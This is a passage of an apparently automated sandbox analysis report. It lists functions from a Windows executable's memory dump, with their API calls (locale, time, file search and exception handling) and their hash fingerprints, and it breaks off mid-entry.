Function 00B800B4 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00B800EC
GetSystemTimeAsFileTime.KERNEL32(?,6126FD41,00B78E30,?,00B9BE77,000000FF,?,00B7FDB4,?,00000000,00000000,?,00B7FDD8,?,00B78E30,?), ref: 00B800F0

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID:
API String ID: 743729956-0
Opcode ID: 99e790e0c8f86b61e3a43493b253a5d3deae60151ddf1632f370b5374baeddf8
Instruction ID: ac2ab50f73e489e636b91ed98045837cd5da824bc340c0d2990bf401f46d6ba5
Opcode Fuzzy Hash: 99e790e0c8f86b61e3a43493b253a5d3deae60151ddf1632f370b5374baeddf8
Instruction Fuzzy Hash: 46F06572A44658EFCB019F48DD41F5EBBE8F709B50F05056AE812937A0DF356904DB80

Function 00B95C5E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B95BB9,?,?,00000008,?,?,00B9BCAB,00000000), ref: 00B95E8B

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 01224e1c85a49b53dfe5fb15cbc4e1d35529b3403af19e7239f8538993f42497
Instruction ID: cbeff8e95463dce92d82fac417d915e08165457908a69d45334b5066325effc2
Opcode Fuzzy Hash: 01224e1c85a49b53dfe5fb15cbc4e1d35529b3403af19e7239f8538993f42497
Instruction Fuzzy Hash: 09B14131550A09DFDB26CF28C4CAB557BE0FF45364F2586A8E899CF2A1C735E991CB40

Function 00B7F555 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B7F56B

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ea6516463d1d84fafaf7b5a8eeca2aa3555c15e6c6fa5cce744bfd190b2d8898
Instruction ID: b49642ef7ec018e26cce74b9cc6111817461d865dfb62c774dbc19e54bff326d
Opcode Fuzzy Hash: ea6516463d1d84fafaf7b5a8eeca2aa3555c15e6c6fa5cce744bfd190b2d8898
Instruction Fuzzy Hash: 3DA18BB29006069FDF18CF58E882AA9BBF5FB49360F24C16AD425E7361C7789980CF54

Function 00B91F38 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B8D2B4: RtlAllocateHeap.NTDLL(00000008,?,?,?,00B8C1B7,00000001,00000364,?,00000005,000000FF,?,00B85495,00BA8E38,0000000C), ref: 00B8D2F5

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B920D9
FindNextFileW.KERNEL32(00000000,?), ref: 00B921CD
FindClose.KERNEL32(00000000), ref: 00B9220C
FindClose.KERNEL32(00000000), ref: 00B9223F

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Find$CloseFile$AllocateFirstHeapNext
String ID:
API String ID: 4087847297-0
Opcode ID: 7c72b3ee125a9ddf06bd78f035a61c3b8031934ba510738919e7ab9dd75abff1
Instruction ID: e4141b3bec40f9fa6c3694650df4f405df45c47ff42f14b919ac8b114b7fa160
Opcode Fuzzy Hash: 7c72b3ee125a9ddf06bd78f035a61c3b8031934ba510738919e7ab9dd75abff1
Instruction Fuzzy Hash: F45151B190411DAFDF24AF3C9C85ABEB7E9DF85354F1441E9F40893211EB308E42AB60

Function 00B91840 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B91894

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1463b0c12073267a447a540ca0a51f1fc79b15a5974e5fdae546bf4dc7acc86a
Instruction ID: f8d251dfc1ac1117fa7d99e859936115afa6957c248ddbb0d9f9f33992648e43
Opcode Fuzzy Hash: 1463b0c12073267a447a540ca0a51f1fc79b15a5974e5fdae546bf4dc7acc86a
Instruction Fuzzy Hash: 87217172610207ABDF18AA29DC82EBA77E8EF45711F1044FAF906D6241EB34DD40E750

Function 00B83FB2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00B84136

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 46c950fa10ac12bcce57e2ef3ae1cad483ce65744b07c50ca1a8a86c26e86de0
Instruction ID: 95d02ff49b8744139b65cfb9fc0980768ed2018c729a730e82e50dae7c43dcc7
Opcode Fuzzy Hash: 46c950fa10ac12bcce57e2ef3ae1cad483ce65744b07c50ca1a8a86c26e86de0
Instruction Fuzzy Hash: AEB1CE3090460B8BCB24FE68C9996BFBBF1EF51300F14469EE692A76B1C731DA45CB51

Function 00B914D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

EnumSystemLocalesW.KERNEL32(00B91580,00000001,00000000,?,-00000050,?,00B91363,00000000,-00000002,00000000,?,00000055,?), ref: 00B9154A

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 167ea28b2209f02e56bc64624e1b475edb99147abf9d9bb929db724d41a84244
Instruction ID: 6cbbd626b1cff0f625b2534787a5d8e686a7336da727ba3b3d19fa1546a24315
Opcode Fuzzy Hash: 167ea28b2209f02e56bc64624e1b475edb99147abf9d9bb929db724d41a84244
Instruction Fuzzy Hash: BF11C63A2007025FDF189F39C8915BABBD1FB94768B16887CE54787B40E771A942D750

Function 00B91960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B919B4

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b7428470646a708a5b0c4a40e5b36f429690110393b9c4a3d5313aad88918a80
Instruction ID: a5965488d4d103cae1e15bf1ca7321226750f71d7f55158f0c036e8a4649ff04
Opcode Fuzzy Hash: b7428470646a708a5b0c4a40e5b36f429690110393b9c4a3d5313aad88918a80
Instruction Fuzzy Hash: 1F11A072610207ABDB14EB68DC56DBB7BECEF05720B1041BAE516D7241EB38ED05E750

Function 00B91B0D Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B9179C,00000000,00000000,?), ref: 00B91B39

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 8892bae97aba45997ce78140db27530bca7987ca86f734ec28bf716ac16583ef
Instruction ID: d84729582490df749efd5e8e56bcdab6c52abdf0328e2f15c2856233d80dc852
Opcode Fuzzy Hash: 8892bae97aba45997ce78140db27530bca7987ca86f734ec28bf716ac16583ef
Instruction Fuzzy Hash: 40012632600113ABDF285B28CC4AABA37E9EB40754F1448B8ED02A3590FA30EE01D6A0

Function 00B917D3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

EnumSystemLocalesW.KERNEL32(00B91840,00000001,?,?,-00000050,?,00B9132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00B9181D

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f1f2d4b4dfea3529114837d7c0055e5308b4ab03a63868ac9628c9fa41f6e9df
Instruction ID: 0918ce1f8025ad1a8cdad5f9beb3c181aa58ee00ae5f9fd50f3846b2d7bb9456
Opcode Fuzzy Hash: f1f2d4b4dfea3529114837d7c0055e5308b4ab03a63868ac9628c9fa41f6e9df
Instruction Fuzzy Hash: 10F0C2762003055FDF246F79D8C1A7A7FD1EB81768B0588BCF9454B690DAB19C42E650

Function 00B8D1BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B880E1: EnterCriticalSection.KERNEL32(?,?,00B8C5F8,?,00BA9290,00000008,00B8C4EA,?,?,?), ref: 00B880F0

EnumSystemLocalesW.KERNEL32(00B8D1B0,00000001,00BA9310,0000000C,00B8CB11,-00000050), ref: 00B8D1F5

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 02bc7afc7793feb6e6b4cfa5fdf0a90708fc065a3af12d0569a05f87a49150aa
Instruction ID: 980bef1467446d3810d3237a9a01e094666eae19b22d855aa6906f9cc494041f
Opcode Fuzzy Hash: 02bc7afc7793feb6e6b4cfa5fdf0a90708fc065a3af12d0569a05f87a49150aa
Instruction Fuzzy Hash: D8F04972A04204DFDB10EFA8E842B9DB7F0EB06B21F1081AAF411DB2E0DB754940CF44

Function 00B91915 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(?,?,00B85495,00BA8E38,0000000C), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000), ref: 00B8C210

EnumSystemLocalesW.KERNEL32(00B91960,00000001,?,?,?,00B91385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00B9194C

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b5507ce3fa4321f037344b1399d39039e319e9ee4967fa8385b563b253a2345c
Instruction ID: 6dce3395c92a6e92a38bccb1fee72506b14074e438e808a6a3361762edcc5d55
Opcode Fuzzy Hash: b5507ce3fa4321f037344b1399d39039e319e9ee4967fa8385b563b253a2345c
Instruction Fuzzy Hash: 41F0EC3930020657CF04AF39DC656677FE4EFC1B60F0A44A8EA068B151C6719943D7A0

Function 00B8CC15 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00B86E33,?,20001004,00000000,00000002,?,?,00B85D3D), ref: 00B8CC49

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bbff755683749cbff208dfa9ad065e117bef7f00096db4c4c023095ba172e506
Instruction ID: cebf3a796629f950595ad613fe5059c7c20210b69163f2fa56d10c0a3c603ce2
Opcode Fuzzy Hash: bbff755683749cbff208dfa9ad065e117bef7f00096db4c4c023095ba172e506
Instruction Fuzzy Hash: 55E01A71500228BBCB123F60ED05A9E3F56EB44760F044061F909661718B358D21EBE1

Function 00B7F8DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 00B7F8E2

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9def9c99fa8801a86c0d2db730a80cfb98b1303ae987b7913d8b3d5bafb48b5b
Instruction ID: 64d3cdaed10b695232323ad2f077a3e7d2fb3df044a0f66f6c401ae5e6dc06bf
Opcode Fuzzy Hash: 9def9c99fa8801a86c0d2db730a80cfb98b1303ae987b7913d8b3d5bafb48b5b
Instruction Fuzzy Hash:

Function 00B8D8E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00B8D8E0

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 7204b253c8aee8e47be2c3181a91df66f505a9062aae954ec1f62e82c276e7d1
Instruction ID: 8db7e3375d1efa21bde2566d8a8306598d974760ff885c61dfdadf59edf81cb2
Opcode Fuzzy Hash: 7204b253c8aee8e47be2c3181a91df66f505a9062aae954ec1f62e82c276e7d1
Instruction Fuzzy Hash: 36A001B17052029B97408F36AA1A20D3AA9EA4AAE17098069A856C7664EE349858AF45

Function 00B9AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00495238,00495238,00000000,7FFFFFFF,?,00B9AACD,00495238,00495238,00000000,00495238,?,?,?,?,00495238,00000000), ref: 00B9AB88
__alloca_probe_16.LIBCMT ref: 00B9AC43
__alloca_probe_16.LIBCMT ref: 00B9ACD2
__freea.LIBCMT ref: 00B9AD1D
__freea.LIBCMT ref: 00B9AD23
__freea.LIBCMT ref: 00B9AD59
__freea.LIBCMT ref: 00B9AD5F
__freea.LIBCMT ref: 00B9AD6F

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 5e45bdbd622f7a0594066628a82ca7effbb1520d016465f520febb8c4cfb4dc7
Instruction ID: b8275fa8d3169854d36aa42d2449530e18b22081458fe8f28e1849e9cda65eb6
Opcode Fuzzy Hash: 5e45bdbd622f7a0594066628a82ca7effbb1520d016465f520febb8c4cfb4dc7
Instruction Fuzzy Hash: 7871B47290020A6BDF219E648C91FAF7BFADF45711F2940F5E914AB291E7359C40C7D2

Function 00B7FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

